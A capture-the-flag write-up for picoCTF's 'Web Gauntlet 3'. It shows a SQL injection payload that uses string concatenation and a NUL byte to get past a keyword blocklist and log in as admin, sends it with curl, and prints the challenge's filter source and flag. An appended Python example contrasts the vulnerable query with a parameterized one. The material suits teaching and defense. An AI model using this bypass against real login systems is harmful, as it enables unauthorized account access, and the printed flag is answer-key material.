Web Gauntlet 3

Problem

Last time, I promise! Only 25 characters this time. Log in as admin.

Site: http://mercury.picoctf.net:32946/
Filter: http://mercury.picoctf.net:32946/filter.php

Solution

  1. The solution to this challenge is completely identical to my solution to Web Gauntlet 2.

  2. The solution query is user=ad'||'min'%00 and it can be sent using cURL like so:

    curl --data "user=ad'||'min'%00&pass=a" http://mercury.picoctf.net:32946/index.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" --output -

     The flag can be retrieved using this command:

    curl http://mercury.picoctf.net:32946/filter.php --cookie "PHPSESSID=n11ugic3f920cjhj6cacohmheg" | grep picoCTF

     See Web Gauntlet 2 for more information.

  3. The code for the filter and the flag is shown in /filter.php once the login is bypassed:

    <?php
    session_start();
    
    if (!isset($_SESSION["winner3"])) {
        $_SESSION["winner3"] = 0;
    }
    $win = $_SESSION["winner3"];
    $view = ($_SERVER["PHP_SELF"] == "/filter.php");
    
    if ($win === 0) {
        $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin");
        if ($view) {
            echo "Filters: ".implode(" ", $filter)."<br/>";
        }
    } else if ($win === 1) {
        if ($view) {
            highlight_file("filter.php");
        }
        $_SESSION["winner3"] = 0;        // <- Don't refresh!
    } else {
        $_SESSION["winner3"] = 0;
    }
    
    // picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}
    ?>
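As an added illustration (not part of the original writeup or the challenge code), the Python below models the page's PHP blocklist in front of an in-memory SQLite table (SQLite is an assumption about the challenge backend) and contrasts the string-built query with a parameterized one. The NUL-byte truncation is an assumption about how the PHP driver hands the query to SQLite as a C string; the table contents and password are constructed.

```python
import sqlite3

# Blocklist and length limit taken from the page's filter.php ($win === 0 branch)
# and the 25-character rule in the problem statement.
FILTER = ["or", "and", "true", "false", "union", "like", "=", ">", "<",
          ";", "--", "/*", "*/", "admin"]
MAX_LEN = 25


def passes_filter(value: str) -> bool:
    """Model of the challenge's blocklist: reject over-long input or any listed token."""
    low = value.lower()
    return len(value) <= MAX_LEN and not any(tok in low for tok in FILTER)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge database (SQLite is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-password')")
    return conn


def login_concat(conn: sqlite3.Connection, user: str, pw: str):
    """Vulnerable pattern: run the blocklist, then splice input into the SQL text.
    Assumption: the PHP SQLite driver hands the query over as a C string, so text
    after a NUL byte is dropped; Python's sqlite3 rejects NUL, so that is modelled."""
    if not passes_filter(user) or not passes_filter(pw):
        return None
    sql = "SELECT name FROM users WHERE name='%s' AND pass='%s'" % (user, pw)
    sql = sql.split("\x00", 1)[0]  # 'ad'||'min' survives the filter; the pass check is gone
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_bound(conn: sqlite3.Connection, user: str, pw: str):
    """Hardened pattern: bound parameters are only ever data, so no blocklist is needed;
    the string ad'||'min' is compared literally and matches no row."""
    row = conn.execute("SELECT name FROM users WHERE name=? AND pass=?", (user, pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "ad'||'min'\x00"  # the page's user=ad'||'min'%00, URL-decoded
    print(passes_filter(payload), login_concat(db, payload, "a"), login_bound(db, payload, "a"))
    # prints: True admin None
```

The point for a defender: the blocklist never sees the word "admin", because the database assembles it at query time, while the bound query compares the raw input and rejects it without any filtering.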

Flag

picoCTF{k3ep_1t_sh0rt_ef4a5b40aa736f5016b4554fecb568d0}